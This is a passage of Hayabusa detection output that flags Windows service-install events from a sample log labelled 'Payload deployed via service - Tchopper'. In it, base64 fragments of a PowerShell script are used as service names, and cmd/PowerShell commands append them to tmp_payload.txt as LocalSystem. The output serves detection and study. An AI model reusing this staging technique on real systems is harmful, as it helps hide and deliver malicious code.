V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file 
-append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | 
select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell 
-command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 
ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:15.677 
+09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file 
-append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | 
select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell 
-command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly 